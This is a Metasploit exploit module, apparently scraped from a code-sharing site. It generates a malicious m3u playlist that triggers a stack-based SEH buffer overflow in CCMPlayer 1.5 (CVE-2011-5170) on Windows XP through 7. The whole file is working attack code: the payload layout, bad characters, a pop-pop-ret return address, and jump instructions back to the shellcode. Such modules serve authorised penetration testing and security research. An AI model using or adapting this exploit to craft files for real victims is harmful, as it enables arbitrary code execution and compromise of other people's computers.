Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::FILEFORMAT
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow',
14
      'Description'    => %q{
15
          This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening
16
        a m3u playlist with a long track name, a SEH exception record can be overwritten
17
        with parts of the controllable buffer. SEH execution is triggered after an
18
        invalid read of an injectable address, thus allowing arbitrary code execution.
19
        This module works on multiple Windows platforms including: Windows XP SP3,
20
        Windows Vista, and Windows 7.
21
      },
22
      'License'        => MSF_LICENSE,
23
      'Author'         => ['Rh0'],	# discovery and metasploit module
24
      'References'     =>
25
        [
26
          ['CVE', '2011-5170'],
27
          ['OSVDB', '77453'],
28
          ['EDB', '18178']
29
        ],
30
      'DefaultOptions' =>
31
        {
32
          'EXITFUNC' => 'process',
33
          'DisablePayloadHandler' => true
34
        },
35
      'Payload'        =>
36
        {
37
          'Space' => 0x1000,
38
          'BadChars' => "\x00\x0d\x0a\x1a\x2c\x2e\x3a\x5c", # \x00\r\n\x1a,.:\\
39
          'DisableNops' => 'True',
40
          'StackAdjustment' => -3500,
41
        },
42
      'Platform'		=> 'win',
43
      'Targets'		=>
44
        [
45
          [
46
            'CCMPlayer 1.5',
47
            {
48
              # pop esi / pop ebx / ret (in ccmplay.exe)
49
              # tweak it if necessary
50
              'Ret' => 0x00403ca7,	# last NULL in buffer is accepted
51
              'Offset' => 0x1000
52
            }
53
          ]
54
        ],
55
      'Privileged'     => false,
56
      'DisclosureDate' => '2011-11-30', # to my knowledge
57
      'DefaultTarget'  => 0))
58

59
      register_options(
60
        [
61
          OptString.new('FILENAME', [ true, 'The file name.',  'msf.m3u']),
62
        ])
63
  end
64

65
  def exploit
66

67
    m3u = "C:\\"
68
    # shellcode
69
    m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "nop").encode_string * 25
70
    m3u << payload.encoded
71
    # junk
72
    m3u << rand_text_alpha_upper(target['Offset'] - (25 + payload.encoded.length))
73
    # need an access violation when reading next 4 bytes as address (0xFFFFFFFF)
74
    # to trigger SEH
75
    m3u << [0xffffffff].pack("V")
76
    # pad
77
    m3u << rand_text_alpha_upper(3)
78
    # long jmp: jmp far back to shellcode
79
    m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-4103").encode_string
80
    # NSEH: jmp short back to long jmp instruction
81
    m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5").encode_string
82
    # pad (need more 2 bytes to fill up to 4, as jmp $-5 are only 2 bytes)
83
    m3u << rand_text_alpha_upper(2)
84
    # SEH Exception Handler Address -> p/p/r
85
    m3u << [target.ret].pack("V")
86
    m3u << ".mp3\r\n"	# no crash without it
87

88
    print_status("Creating '#{datastore['FILENAME']}' file ...")
89

90
    # Open CCMPlayer -> Songs -> Add -> Files of type: m3u -> msf.m3u => exploit
91
    file_create(m3u)
92

93
  end
94
end
95

96